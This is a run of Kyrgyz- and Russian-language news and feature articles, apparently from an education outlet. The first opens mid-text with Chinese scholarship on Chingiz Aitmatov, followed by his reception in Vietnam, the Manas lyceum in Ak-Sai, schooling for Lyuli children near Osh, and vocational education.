Шы Жиншию, кытай улутунан, аял, профессор 2007-жылы «Айтматов Кытайда» аттуу илимий изилдөөсү менен Тыянжын университетинин докторлук атагына ээ болгон. Китеби (275 бет) 2007-жылы Хибей эл басмасы жагынан жарык көргөн. Азыр Хибей педагогикалык университетинде чет эл адабияты, анын ичинде батыш элдер адабияты боюнча доктор тарбиялайт. Негизги изилдөө багыты салыштырма адабият жана совет-орусия адабияты, батыш Азия адабияты.

Ли Шө, кытай улутунан, профессор, 2012-жылы «айтматов жана азыркы заман кытай адабияты» (220 бет) аттуу илимий эмгеги менен Вухан университетинин докторлук атагына ээ болгон.

Лию Хуйхуй, кытай улутунан, профессор, 2013-жылы «Айтматовдон Пелевинге чейин» (115 бет) аттуу илимий эмгеги менен Шаӊхай чет эл тили университетинин докторлук атагына ээ болгон.

Хан Жийежин, аял, кытай улутунан, профессор, Хайнан педагогикалык университети филология институтун жетектейт, ары магистр, доктор тарбиялайт, негизги изилдөө багыты салыштырма адабият жана орус адабияты. Жогору окуу жайларда окутулуучу «Чет эл адабият тарыхын» жазып чыккан, 2004-жылы «20-кылым дүйнө адабиятынын кеменгери  Айтматов» (273 бет) аттуу илимий эмгеги Сычуан эл басмасы жагынан жарык көргөн, андан бери көп жолу кайра басылды. Кытайдагы арналуу Айтматов изилдеген окумуштуулардын бири.

Вын Зуйин, кытай улутунан, профессор, Фужыян педагогикалык университети чет эл адабияты факультетин жетектеген, магистр, доктор тарбиялаган, азыр ардактуу эс алууда. Дүйнө адабиятын, анын ичинде евро-америка адабиятын, азиядан кытай жана жапон адабиятын негиздүү изилдейт. 1992-жылы Фужыян агартуу басмасы жагынан «Горькийден Айтматовго» деген 422 беттүү илимий эмгеги жарык көргөн. Кытайда Айтматов изилдөөгө эӊ мурда ат салган алгы муун окумуштуу.

 Балдар адабиятында

 Дүйнө балдар адабияты желелеш китептери аттуу 50 чыгаан чыгарманын ичинде «Эрте келген турналар» (эл басмасы, 1999-жыл, кытайча) деген балдар окуулугу бар, бул жыйнакка айтматовдун «Эрте келген турналар», «Ак кеме» деген эки повести киргизилген. Андан башка алтын башак өспүрүмдөр эл аралык сыйлыгына ээ болгон желелеш китептердин ичинде «Ак кеме» (Анхуй өспүрүм-балдар басмасы, 2013-жыл) деген балдар, өспүрүмдөр окуулугу бар, мында Айтматовдун «Ак кемесин» Су Нан, Мей Зыхан аттуу эки жазуучу балдарга эӊ жакын, эӊ жөнөкөй тил менен, ого бетер кызыктуу сюжеттер менен «Баланын эки жомогу», «Ак кеме», «Момун таята», «Мүйүздүү бугу эненин жомогу», «Бугу келди», «Кар-борошолуу токой», «Арыба, ак кеме, мен келдим» деген беш балдар аӊгемесине өзгөртүп жазып чыккан. Балдар узун чыгарманы чыдап окуй албай калат, бир повесттин тартымдуулугун ашыруу үчүн бир нече майда темаларга бөлүп, тилин жөнөкөйлөштүрүп, сүрөттөр менен коштоп, сюжетин балдардын кабылдоосуна ылайыкташтырып койсо абдан сонун болот экен.

Ал эми кытайдагы кыргыздар «Ак кеменин» негизинде 2006-жылы «Мүйүздүү бугу эне» деген балдар жомок китебин чыгарышкан. «Мүйүздүү бугу эне» уламышы негизинде өзгөртүп жазылып, кыстырма сүрөттөр сызылган.

2011-жылдан бери Шинжаӊ педагогикалык университети филология факультети менен «Манас» изилдөө борбору атынан профессор Мамбеттурду Мамбетакун мырза Айтматовдун туулган күнүнө карата атайын күн тартип тургузуп, байланыштуу кишилерди лекцияга чакырып, Үрүмчүдөгү кыргыз студенттер жана кыргызстандыктар менен чогуу өткөрүүгө шарт түзүп берип келатат. 2013-жылы университеттин дарбазасына Айтматовдун чоӊойтулган сүрөтүн коюп, атайын плакат жазып, зал толгон киши чакырып Айтматовду эскерди, ал эми 2014-жылы андан да чоӊ зал толгон жаштар, студенттер, окумуштуулар менен чогуу өткөрүүгө данакер болду. Ал турмай 10-июнду да Шинжаӊ педагогикалык университети «Манас» изилдөө борбору атынан китеп окуу күнү кылып жайылтууну демилге көтөрүп жатат.

Айтматовдун чыгармалары башка улуттар үчүн асемдик ырахат алуунун, дилин тазартуунун, адамдык жашоонун жолуна түшүүнүн, адамгерчиликтин рухий азыгы болор, ал эми кыргыздар үчүн андан да зарылы, улуу рухтун соолбос булагы, өчпөс коломтосу, бүтпөс кенчи.

 

(макала кыскартылып жарыяланды)

Мамбеттурган Курман,

Кытай СУАР теле станциясынын журналист изилдөөчүсү

 

ЧЫНГЫЗ АЙТМАТОВ ВО ВЬЕТНАМЕ

$
0
0

Чынгыз Айтматов – выдающийся кыргызский писатель, который своими творениями нашел место в сердцах миллионов людей на планете. В Ташкенте, столице Узбекистана, будучи аспирантом Института востоковедения имени Абу Райхана Беруни (1985-88), я познакомился с кандидатом филологических наук, господином Ле Винь Куок, научным сотрудником Cектора литератур стран зарубежного Востока данного института, который стал рассказывать мне, как почитают произведения Чынгыза Айтматова на его родине, во Вьетнаме. Затем, по моему предложению, он написал краткую заметку об этом.  Это было в начале 1988 г.  Господин Ле Винь Куок в 1991-м году защитил докторскую диссертацию на тему «Вьетнамская поэзия 30-х — первой половины 60-х годов: (Становление и развитие революционной поэзии)» (Автореферат. — Москва: Институт востоковедения АН СССР, 1991. – Специальность 10.01.06 — Литература народов Азии и Африки. – 49 с.). В данной диссертации, выполненной в Институте востоковедения имени Абу Райхана Беруни АН Узбекистана, проанализирован особо важный период развития вьетнамской литературы XX века, связанной с предреволюционным и послереволюционным этапами истории страны, когда шла борьба за ее освобождение от иноземных захватчиков, за воссоединение и современное переустройство общества. Таким образом, вьетнамское айтматововедение было органической частью литературоведческих изысканий Ле Винь Куока. Он был бывшим вьетнамским военным, который, попав в СССР, стал ученым, впоследствии, профессором восточной литературы и поэзии в Ташкентском университете.

 Тынчтыкбек Чоротегин

Большую популярность приобрели во Вьетнаме произведения Чынгыза Айтматова.

В 1962 году была переведена на вьетнамский язык «Джамиля». В 1964 году были переведены произведения кыргызского прозаика «Первый учитель», «Тополек мой в красной косынке», «Лицом к лицу», «Верблюжий глаз», «Соперники», составившие сборник «Тьуен нуй дой ва тхао нгуен» («Повести гор и степей»). Этой книге, выпущенной в Ханое издательством «Ван хок» («Художественная литература»), предпослано обширное предисловие.

В 1980 году на страницах еженедельника «Ван нге» («Литература и искусство»), помещены переводы отрывка из произведения Чынгыза Айтматова «Пес, бегущий по краям моря» и его рассказа «Красное яблоко». Последний рассказ впоследствии вошел в сборник переводов рассказов советских писателей «Куа тао до» («Красное яблоко»), который был выпущен издательством «Фу ны» («Женщина») в 1981 году.

В 1982 году переизданы издательством «Ван хок» переводы произведений Чынгыза Айтматова «Джамиля», «Первый учитель», «Тополек мой в красной косынке» и «Верблюжий глаз», составившие сборник «Жа-ми-ла» («Джамиля»).

В связи с празднованием 60-летия образования СССР издательство «Ван хок» выпустило сборник переводов произведений Чынгыза Айтматова «Кон тау чанг» («Белый пароход»), состоящий из трех повестей писателя: «Прощай, Гульсары!», «Белый пароход» и «Пес, бегущий краем моря».

В еженедельнике «Ван нге» («Литература и искусство») был опубликован также отрывок из его романа «И дольше века длится день».

Горячо отзывается о произведениях замечательного кыргызского писателя в литературоведческой статье «Певец гор и степей, или явление Чынгыза Айтматова» Ле Шона, рецензии к рассказу «Джамиля» Буй Ван Чонг Кыонга на страницах журнала «Тап ти ван хок» («Литературный журнал». – 1982. — №5.) и в литературоведческой статье «Чынгыз Айтматов и человек труда» Ань Чука на страницах еженедельника «Ван нге» (1982. – 25 декабря.).

Переведены затем на вьетнамский язык и опубликованы в журнале «Ван нге куан дой» («Литература и искусство в армии») его рассказы «Встреча с сыном» (1987. — №7.) и «Солдатёнок» (1986. — №8.). В 1986 году вышел в свет перевод его романа «И дольше века длится день», выпущенный издательством «Лао донг» («Труд»).

В связи с этим появилась новая литературоведческая статья До Суан Ха «Особенности художественного мышления Чынгыза Айтматова» (Журнал «Тап ти ван хок». – 1982. — №2.).

Недавно вышел в свет перевод на вьетнамский язык его нового романа «Плаха».

В литературоведческих статьях и рецензиях говорится о том, что главный пафос произведений Чынгыза Айтматова – утверждение ответственности каждого человека перед собою, всеми, природой, миром, историей и даже вселенной. Подчеркивается, что Чынгыз Айтматов сумел отобрать в борьбе за новое самое главное, проследить сложный процесс развития социалистических элементов в жизни народа и душе человека; писатель проникает в бездну противоречий, беспощадно разоблачает отрицательные явления в жизни.

Отмечается, что герои произведений Чынгыза Айтматова, будучи глубоко национальными и индивидуальными образами, вместе с тем представляют собой высоко обобщающие типы. У Чынгыза Айтматова — чувства сострадания тесно связаны с верой в человека. Он всегда отыскивает в противоречиях проявление возвышающих личность чувств, поэтому его произведения исполнены подлинным и глубоким гуманизмом.

Анализируются в статьях такие художественные особенности произведений кыргызского писателя, как динамическая напряженность, конфликтность ситуаций, философичность, высокая интеллигентность. Прослеживается развитие стилевых особенностей Чынгыза Айтматова.

«В произведениях «Джамиля», «Тополек мой в красной косынке» и «Первый учитель», — пишет Ань Чук, — автор сочетает реализм с поэтической романтикой… Но в последующих произведениях, таких как «Материнское поле», «Прощай, Гульсары!», «Белый пароход», «Пес, бегущий краем моря», «И дольше века длится день», его реализм становится суровым, как будто жестоким…, а его романтика – глубокой, задумчивой. Автор обращается к истокам предков, к мифам, сказаниям, которые впоследствии превращаются в органическую часть его произведений».

Каждая книга кыргызского писателя – открытие неведомого, выстраданное автором произведение. Его творчество несет великие идеи. Его книги заставляют нас думать, переживать, помогают нам глубже понимать, больше уважать и любить человека, бороться за жизнь. На это способны только подлинные художественные произведения, — подчеркивают авторы предисловий, статей и рецензий, опубликованных во Вьетнаме.

 Ле Винь Куок,

(из личного архива)

«МАНАС»ЛИЦЕЙИНДЕГИ ЗАМАНБАП БИЛИМ

$
0
0

Кыргызстандын Эл мугалими Жаныш Жанузаков жетектеген лицейдеги мээнеткеч агартуучулар жана жетишкендиктер

(Башталышы №47 (2015-жыл) санында)

Эртеӊ менен саат сегизге жакын калганда окуучулар күнүгө алгач гимнди ырдашып, андан соӊ кадимки Кара жоргону бийлешет экен. Жогорку класстын окуучулары ылдыйкы класстын окуучуларын шефке алып, үй тапшырмасын бирге аткарышат. Бул кайсы бир деӊгээлде жогоркуларына мурда билгенин кайталоо болсо, кийинкилерине кошумча түшүнүк бергенге шарт түзөт. Чоӊу кичинесине үстөмдүк кылмайды ушинтип жоготушуптур. Мында интернатка 8-класстан тартып жалпы облус боюнча тандалма окуучулар гана кабыл алынгандыктан мыкты окуучулар көп. Андан тышкары жергиликтүү айылдын балдары да окушат. Жалпысынан 980 окуучу, 65 мугалим бар.

Мен чейрек чыгып жатканда барыптырмын. Класстарга кирсем экиден-үчтөн ата-энелер олтурушат. Сурасам: — Балдарыбыздын семестринин жыйынтыгын чогуу чыгарганы келдик, — дешти. Мугалим окуучуну ата-энесинин көзүнчө сурап, баа коет. Албетте, бул жерде окуучунун билимин мугалим баалайт, ага ата-эне кийлигише албайт. Бирок баласы кандай билим алып жатканын өз көздөрү менен көрүшөт. Ата-энелердин чогулушу мектепке канчадан акча чогултуш керек деген маселе менен эмес, тарбия, билим багытында гана болорун Ф.Орозалиева, Н.Бейшекеева, Р.Осмоналиева сыяктуу ата-энелер ырасташты.

– Эми биз бул жакка балдарыбыз мыкты билим алсын деп берип жатабыз. Өзүбүздүн айылдагы мектеп деле жакшы, бирок бул жактын шарты бизге туура келет, — деп жаап-жашырбай ачык айтышты башка айылдардан келген ата-энелер. Окуучулардан сурасам, бул лицейге келип окуп жатышканына сыймыктанышкандай, көӊүлдөрү куунак болуп, тартынбай  жооп берип жатышты.  Балким, мектеп физика-математика багытында окутулуп, бул сабактар тереӊдетилип үйрөтүлгөнүнөн улам болсо керек дедим. Айылда деле ата-энелер мектепти тандап калышыптыр.

- Ата-энелер менен тил табышпаган мугалимдин иши жылбайт. Ата-эненин ою мугалимге түз болгондо гана кадыр-барк, ишеним жогорулайт. Биз муну биринчи планга койдук. Лицей ушул мектепке биригип жатканда  ата-энелер менен байланыш жакшы эмес экен. Баарын чогултсам, баягы бир кезде мен окуткан балдарым келип жатышпайбы. Убакыт өтүп, көрсөөздөрү ата-энеге айланып калышыптыр. «Ачык сүйлөшүп алалы, балаӊар жакшы билим, тарбия алышы үчүн чогуу аракет кылалы», — деп максаттарымды айттым. «Иши кылып “Манас” лицейин Ак-Сайга көчүрүп келсеӊиз баарына макулбуз», — дешти. Ошентип, башында сүйлөшкөндөй ата-энелер менен байланыш бекем. Алар кошумча сабактардан тышкары бий, шахмат, спорт сыяктуу кружокторун ачууну суранышты. Биз ошолордун өтүнүчүн аткарып, ишеничин актайлы деп тынбай иштеп жатабыз, — дейт Жаныш агай.

Мисалы, комузчулардын кружогун айтылуу Шекербек           Шеркуловдун небереси Намазбек Шеркулов келип өтүп турат экен. Атайын бий залы, комузчулардын залы эки башка жерде жайгашыптыр. Ийиле бийлеп жаткан кыздарды көрүп кубандым.

- Эртеби-кечпи жакшы ишти адамдын көзү көрөт, — деди Эл мугалими Жанузак агай сөзүн кошумчалай. — Мугалимдерим ата-энелерден, коомчулуктан мактоо угуп жатышат. Мунун баары жалпы коллективдин иши. Мен мугалимдериме абдан ыраазымын. Алар менин идеяларымды турмушка ашырууда, — деди агай.

Биригүү демекчи, Ак-Сай айылындагы Ш.Жумагулов атындагы  орто мектепке аталган лицей КРнын Өкмөтүнүн жана Билим берүү жана илим министрлигинин токтомунун негизинде 2010-жылы кошулуп, Ш.Жумагулов атындагы “Манас” интернат-лицейи болуп аталган.

Мектепке жеке жумушу менен кире калган Айыл өкмөтүнүн башчысы Козубек Айталиев бизге төмөндөгүлөрдү айтып берди:

- “Манас” лицейин жалпы эл бул мектепке чакырып туруп алды. Себеби, мектеп начар абалга жетип калган. Мындайча айтканда каралбай калган. Ошол Апрель революциясынан кийин элдин өтүнүчү менен лицей бул жакка көчүп кирди. Айыл өкмөтү да мектептин жакшырышына кол кабыш кылып жатат. Өзүӊүз көрүп тургандай, мектеп азыр облуста эле эмес, жалпы республикада алдыӊкы мектепке айланып олтурат.

Айылдык кеӊештин депутаты Жаныбек Бейшенов да Апрель революциясына чейин бул мектептин айнектери сынып, чаӊы сапырылып калганын айтып, Ж.Жанузаковдун жетекчилиги, аракети менен эӊ сонун мектепке айланганына токтолду.

- Мурда бул мектепти бирөөгө көрсөткөндөн уялсак, эми келген меймандарга биринчи ушул мектебибизди мактанып көрсөтчү болдук, — деди айылдык депутат.

  Лицейде 80 пайызга жакыны жаш мугалимдер экен. Ушунун өзү эле көп нерсени айтып турат. Жаӊы технология бул жерде жаӊылык деле эмес экен. Төрт интерактивдүү доска, эки компьютердик класс иштеп жатат. Республикалык “Жылдын мыкты инновациялык мектеби” сынагында 3-орунду ээлешкен. “100 инновациялык мектеп” долбоорунда да жеӊүүчү аталышып, мектепти жаӊы технологиялар менен жабдышкан. Ар бир мугалимдин колунда ноутбук бар. Мугалим ноутбукту коюп алып, сабагын интернет менен айкалыштырып, билимди заманбап багытта тереӊдетип берет. Интернет байланышы мектепте ар дайым камсыз кылынган. “Алиппе ТВ” менен да кошумча тажрыйба алышат. Г.Чегебаева, А.Абдыракманова аттуу мугалимдер республикалык “Жылдын мыкты мугалими” конкурсунда алдыӊкы орундарга жетишкен. Мугалимдер менин алдыма бир том боло турган усулдук материалдарын ташташып, бул материалдарды “Кутбилимге”, «Кутбилим-Сабакка” жарыялап берүүсүн өтүнүштү. Жалаӊ чыгармачылык менен жигердүү иштеп жаткан мугалимдердин жүздөгөн методикалык иштелмелерин  эми биз карап чыгуубуз парз.

Лицей ачылгандан бери циклдык жана блоктоштурулган окуу программасынын негизинде интеграция жана интерактивдүү усулдарын колдонуу менен физика, математика сабактарын тереӊдетип окутуп, кесипке баштапкы багыт берүү проблемасынын үстүндө иштеп келе жатат. Окутуу беш циклга бөлүнгөн:          1. Даярдоо циклында жылдык окуу программасы менен таанышат; 2. Теориялык циклда теориялык билимдин негизи берилет; 3. Практикалык циклда лабораториялык, практикалык иштер өткөрүлөт; 4. Чыгармачылык циклда окуучу өз алдынча изденет; 5. Калыптандыруу циклында өтүлгөн материалдарды кайталоо болот. Блоктоштурулган окуу программасында билимдин эӊ негизги маӊызы башка негиздер менен системалуу байланышта ачылып, бир нече теманын теориялык негизин топтоштуруп бир тема катары өтүп, практикалык көнүгүүлөргө көбүрөөк убакытты утуп алууга болот дешти. Мында интеграция да башкы рычаг боло алат. Интеграциянын башкы максаты — физика, математика сабактарынан тереӊ билим берүү менен башка сабактар да келип эле физика, математика сабагына интеграцияланат экен. Лицейде окуу 5 семестр, 2 сессиядан турат. Аталган системаны окуу программасына ишке ашыруу үчүн лицейде илимий усулдук борбор уюштурулуптур. Бул борбордо сабак берүүгө байланышкан бардык иштер жүргүзүлөт. Ар жылы апрель-май айларында Бишкек шаарындагы ЖОЖдордун мугалимдери мектепке келип окуучуларга сабак өтүшөт. Мунун өзү окуучуларга стимул гана бербестен, кесип тандоого жана жаӊы идея, заманбап технологиялар менен таанышканга мүмкүнчүлүк берет. Мугалимдер жазган илимий иштерин ЖОЖдун мугалимдерине көрсөтүп, рецензия алышат.

- Блоктоштуруп окутууну киргизип жатканыбызда белгилүү эле педагогдор муну ишке ашыра албай коюшканын айтышкан. Бирок биз ишке ашырдык. Бул азыр айрым сабактардын кыскарып жаткан учурунда мугалимдин убакытты үнөмдөп, кеӊейтүүсүнө шарт түзгөнү менен баалуу, — деди Жаныш Жанузаков агай усулдук ыкманы түшүндүрүп жатып.

Мына ушундай окутуунун жаӊы багытын көздөгөн лицейди 1991-жылдан 2015-жылга чейин 122 бүтүрүүчү “Алтын   медаль”, 218 бүтүрүүчү Артыкчылык аттестаттары менен аякташкан. Алардын ичинен 143 окуучу республикалык сынактарда байгелүү орундарга ээ болушкан. Лицейди аяктагандар ЖРТдан эӊ жогорку бал топтошуп, Кыргызстанда эле эмес, чет өлкөлөрдөгү алдыӊкы ЖОЖдордо да билим алып жатышат. Мунун баары жогорудагы окутуунун өзгөчө усулдук ыкмасынын натыйжасы дешти мугалимдер. Анан да улуу Манастын атын алып жүргөндүн өзү да лицей үчүн оӊой эмес, тузу, милдети оордой көрүндү. Кантсе да ак жүрөк мугалимдерди, окуучуларды Манас бабабыздын руху колдоп жүрүшүн тиледим.

Майрамбек Токторов,

“Кутбилим”, Бишкек-Талас

КӨЧӨ КЫДЫРГАН ЛӨЛҮЛӨР ДА БИЛИМ АЛУУНУ КААЛАШАТ

$
0
0

Лөлү улутундагы Абдувалиевдердин үй-бүлөсүндө он бир бала бар. Алардын экөө кенже куракта болсо, калган тогузу мектеп жашында. Бул балдардын алды 12-13 жашка келип калса дагы, тилекке каршы, жашоо-шарттын айынан бир да жолу мектеп босогосун атташкан эмес. Жакында эле айыл өкмөтүнүн, социалдык педагогдун жана айылдык мектептин директорунун кийлигишүүсү менен бул үй-бүлөдөгү жети бала Аравандагы жатак-мектепке жайгаштырылды. Учурда дагы эки баланы мектепке жайгаштыруу аракети көрүлүүдө.

Жалпы он үч кишиден турган Абдувалиевдердин үй-бүлөсүндөүч атанын балдары жашайт. Алар кичинекей тар бөлмөдө эптеп күн өткөрүшөт. Биз бул үй-бүлөдөн кабар алуу үчүн атайын барганыбызда эки кенже курактагы бала жана мектеп курагындагы дагы  эки бала караӊгы, терезелеринин айнектери сынган үйдө, мештин жанында жылынып отурушуптур. Алардын атасын чакыртканыбызда, балдарын мектепке окутмак түгүл күнүмдүк жашоого эптеп каражат таап, балдарынын кара курсагын араӊ тойгузуп жаткандыгын айтты.

- Биз бир үйдөүч бир тууган жашайбыз. Бирибиздин аялыбыз жок, бирибиздин күйөөбүз жок, эптеп 11 баланы багып жатабыз. Биз буларды окутмак тургай күнүмдүк наныбызды араӊ таап жейбиз. Жети балабызды жатак мектепке орноштуруп берген айыл өкмөтүнө, мектептин директоруна ыраазыбыз. Бирок үч балабызды ал мектептен алып кеткиле, такыр сабак окубай жатышат дешти. Эми эмне кылабыз билбейбиз, — дейт үйдүн кожоюну.

Бул үй-бүлө Ош шаарынан анчалык алыс эмес Кара-Суу районуна караштуу Жаӊы турмуш айылында жашайт. Бул айылда жалаӊ лөлүлөр отурукташкан. Учурда үч жүздөн ашуун түтүн бар. Алардын билим алууну каалаган балдары айылдагы М.Турсунзада атындагы мектепке барып окушат.  Ал жакта азыр лөлү улутундагы 566 окуучу билим алат.

- Бул балдарды мектепке алып келгиле деп канча жолу айтып, канча жолу өзүбүз аракет кылдык. Бирок такыр майнап чыкпаганынан  айыл өкмөткө кайрылып, акча бөлдүрүп, балдарды ич кийиминен бери жаӊыртып туруп жакында эле жетөөнү Араванга алып барып меткепке жайгаштырып келгенбиз. Жетөөнүн теӊ документтери жок. Эми минтип Өзбекстанга   турмушка чыккан эжеси күйөөдөн чыгып келип алыптыр. Эми анын балдарын мектепке киргизишибиз керек. Берки алып кеткиле деп жаткан балдардан дагы кабар алабыз. Буга чейин бизге булар балдарды алып кеткиле деп жатат деп айтышкан эмес, — дейт айылдын мектеп директору Абдуллаева Гүлчехра.

Балдарды мектепке тартуу үчүн мугалимдер ар бир үйдү кыдырышат

Мектеп директорунун айтымында, бул айылда Абдувалиевдердин үй-бүлөсүнө окшогондор абдан көп. Алардын көбүнүн документтери жок. Бирок айыл мектеби балдарды документи жок деп албай койбойт. Тескерисинче, ар бир баланын билим алуусуна шарт түзүүгө аракет кылышып, ар бир үйдү кыдырып, балдарды мектепке өздөрү алып келишет.

- Биздин мектеп мурда Тажиматов атындагы орто мектептин филиалы болчу. Анда деле лөлү улутундагы окуучулар окуган. 1989-жылы төрт бөлмөлүү М.Турсунзада башталгыч мектеби болуп уюшулган. 1999-жылдан баштап экинчи корпус курулуп, тогуз жылдык мектеп болуп калган. Окуу кыргыз тилинде жүргүзүлөт. Ал кезде окуучу өтө аз эле. Үймө-үй кыдырып, ар бир баланы каттоого алып, ата-энелерине түшүндүрүп жатып араӊ алып келчүбүз. Көп окуучулардын документтери жок. Аларды документи жок болсо дагы алабыз. Себеби документи жок деп албай койсок, анда айылдын 50% ашык баласы окубай калат. Азыр 566 окуучунун 156сында документ жок. Мурда  256 окуучунун документи жок болчу. Айыл өкмөттүн, соцкызматкердин   жардамы менен 150 жакын балага документ алып бердик, — дейт мектеп жетекчиси.

Гүлчехра Режавалиевнанын айтымында, мурункуга салыштырмалуу  билим алууну каалаган балдардын саны жылдан жылга өсүүдө. Учурда 184 орундуу мектепте 566 окуучу окуйт. Ал тургай балдар мектепке батпай калгандыктан, алтынчы жана тогузунчу класстын 117 окуучусу Мырзажанов атындагы орто мектепте окушат.

- Азыр лөлүлөрдүн аӊ сезими өсүп, балдарынын билим алышына кызыкдар боло башташты.  Мурда 1-класска балдарыӊарды алып келгиле деп ар бир үйдү кыдырып чыкчубуз. Азыр болсо өздөрү алып келип калышты. Бирок ошентсе дагы арасында мектебиӊдин кереги жок дегендер дагы эле бар. Андай ата-энелер менен түшүндүрүү иштерин жүргүзүп, конференцияларды өткөрүп жатабыз. Мен өзүм дагы үймө-үй кыдырып, ар бир ата-эне менен өзүнчө сүйлөшүп, көндүргөнгө аракет кылам, — дейт лөлү улутундагы тарых сабагынын мугалими Төлөн Кадыров.

14 жашында мектеп босогосун аттагандар бар

 12 жаштагы Бекзат Козуев учурда 2-класста окуйт. Ал ата-энеси менен кыдырып кетип, анча-мынча акча таап жүрүп окубай калган.

Учурда Бекзатка окшоп өзүнөн кичүү балдар менен окугандар абдан көп. Себеби  лөлүлөрдүн көпчүлүгү көчүп жүргөндүктөн, туруктуу жашаган жери жок мектепке барбай калышат. Ал тургай 1-класска 14, 15 жашында барган балдар да бар.

- Балдар канча жашында келсе дагы, биз мектепке алганга милдеттүүбүз. Анткени ар бир бала билим алууга укуктуу. Азыр 2-класста 14 жашар бир окуучу бар. Андай балдарды биз катуу көзөмөлгө алабыз. Себеби бала чоӊоюп калгандан кийин кабыл алуусу начарлап калат. Ошондуктан ал балага көбүрөк көӊүл бурабыз. Алар 9-класска барганда 21, 22 жашка чыгып калышат, — дейт Г.Абдуллаева. — Кээ бир ата-энелер бир жума, бир ай кыдырмайга кетип калышат. Ата-энеси жок болсо балдардын кылары белгилүү да. Андай учурларда мугалимдер эртеӊ менен эрте үйлөрдү кыдырып, балдарды ойготуп, мектепке чакырып чыгышат. Бирок мындан он жыл мурда биз бардык балдарды өзүбүз чакырып чыкчу элек. Азыр болсо 20% баланы чакырып чыгабыз. Ата-энелерине кошулуп кыдырып кеткендер да бар. Бирок мурункуга караганда азайды. Себеби ата-энелерде дагы, балдарда дагы окуш керек экен, билим алыш керек экен деген түшүнүк пайда боло баштады. Мурда аябай кыйналчубуз. Үч жыл мурун 1-класска бир эле класс ачылса, быйыл жети класс ачтык.

Жаӊы турмуш айылында мындан башка дагы бир катар чечилбей жаткан проблемалар бар. Алар көпчүлүк учурда  көчүп-конуп жүргөндүктөн ооруканаларга көрүнө алышпайт. Кайсы ооруканага барышпасын бири-бирине түртө салгандыктан, өздөрү деле догдурга кайрылышпайт.

-     Облустук ооруканага барышса районго, райондук ооруканага барса шаардыкына баргыла деп эч бири кабыл албайт. Кош бойлуу аялдар көбүнчөүйлөрүнөн эле төрөп коюшат. Балдары ооруса өздөрү билгендей эле дарылай беришет. Андыктан бизде өлүмдүн саны абдан көп, — дейт айылдаштарынын жашоо-шартына жаны ачыган Төлөн Кадыров.

Ал тургай бир канча жылдан бери жергиликтүү бийликке кайрылып, айылды аралап өткөн суу каналынын ичин тазалата албай келишет. Ал арыкка болгон акыр-чикир чогулгандыктан, балдардын ден соолугуна залалын тийгизип, жаш балдардын көбү ич келте оорусуна кабылышып, өлүмгө дуушар болушат.

Лөлүлөрдүн Дүйшөнү

 Төлөн Кадыровду айылдаштары “Лөлүлөрдүн Дүйшөнү” деп аташат. Ал лөлү улутунан чыккан биринчи мугалим.  Төлөн Кадыров алгач Ош педагогикалык колледжин аяктап, андан кийин ОГПИнин тарых факультетин бүтүргөн.  1997-жылдан бери ушул мектепте иштейт.

- Мындан бир канча жыл мурун 1-жолу мен мугалим болуп келсем, азыр алты лөлү мугалим бар. Учурда дагы 12 бала жогорку окуу жайында окуп жатышат. өзүмдүн  Медициналык колледжди бүткөн тууганымды мектепке мугалим болуп иште деп көндүрдүм, учурда мугалим болуп иштеп,  химия, биология факультетинде дагы окуп жатат, -  дейт Т.Кадыров.

Чолпон Кийизбаева, “Кутбилим”

БАШТАЛГЫЧ КЕСИПТИК БИЛИМДИН КЕЛЕЧЕГИ КАНДАЙ?

$
0
0

Кыргыз Республикасынын Өкмөтүнүн жаӊы түзүмүнүн бекитилгендигине байланыштуу жана аткаруу бийлигинин мамлекеттик органдарынын ишин оптималдаштыруу, алардын милдеттерин, функцияларын бөлүштүрүү жана Кыргыз Республикасынын Жогорку Кеӊешинин 2015-жылдын 5-ноябрындагы  “Кыргыз Республикасынын Өкмөтүнүн түзүмү жөнүндө” токтомун ишке ашыруу максатында, КР Өкмөтүнүн 2015-жылдын 16-ноябрындагы №768 токтому менен Кыргыз Республикасынын Билим берүү жана илим министрлигинин карамагына Кесиптик-техникалык билим берүү агенттиги өткөрүлдү.

Ушул кесипти тандаганыма өкүнбөйм

 17 жаштагы Майрамбек Рашов Бишкек шаарындагы №5 кесиптик билим берүүчү лицейдин 2-курсунун студенти. Эмерек жасоо боюнча адистикте окуп жаткан Майрамбек быйылкы өндүрүштүк практикада өзү тандаган кесибинин купуя сырларын үйрөнүп гана тим болбой, кем-карчын толуктаганга каражат тапканына өзгөчө кубанычта.

Майрамбек Ысык-Көл районунан келген. 9-классты аяктаганда жогорку окуу жайда окууну кыялданган өзү курдуу балдардан айырмаланып, башталгыч кесиптик-техникалык билим берүүчү орто окуу жайында окуп калды. Буга анын ата-энеси түрткү болду.

- Чынымды айтсам, №5 кесиптик-техникалык лицейге ата-энемдин айтканы менен келгем. Адегенде анчалык көӊүлдөнгөн эмесмин. Качан гана өндүрүштүк практикага чыгып, өз колум менен буюмдарды жасай баштаганда кызыга баштадым. Практикадан тышкары өз алдымча иштеп, бир жолу 15 миӊ, дагы бир жолу 30 миӊдей акча таптым, — дейт Майрамбек сүйүнгөнүн жашырбай.

Майрамбектин курбалдашы Таалайбек уулу Бекболсун да практикалык тажрыйба учурунда гана ушул кесип өзүнүкү экендигин сезди. Айрыкча, жай мезгилинде өз алдынча иштеп акча таба баштаганда өзү тандаган кесип эӊ керектүү экендигин, кандай шартта болбосун жумушсуз калбай турганын билди. Тапкан акчасын өзүнө жумшап, ата-энесин да унуткан жок. Ал лицейдин диплому менен эле чектелбей, окуусун жогорку окуу жайдан улантууну кыялданат.

Кайра куруу жылдарына чейин башталгыч кесиптик-техникалык окуу жайлар эл арасында кеӊири суроо-талапка ээ болбой келген. Анда негизинен мектепте начар окуган же жогорку окуу жайга өтпөй калган балдар окушкандыктан, жаштар арасында популярдуулугу жок эле. Кийинки мезгилде жождорду аяктаган улан-кыздар адистиги боюнча иш таппай, кайра эле кара жумуштарда иштеп каражат табуунун аргасында жүрүшкөнүн көргөн көпчүлүк ата-энелердин көз караштары өзгөрүп калгандай. Анын үстүнө жождун диплому менен деле каалагандай каражатка ээ болуу азыркы шартта мүмкүн эместигин көрүп жатпайбызбы.

Азыркы учурда бизде 150дөн ашык кесиптик-техникалык орто билимге окуткан 101 окуу жайы бар. Алар борбор шаарыбыздан тышкары Чүй, Нарын, Талас, Ош сыяктуу бүт региондордо жайгашкан.

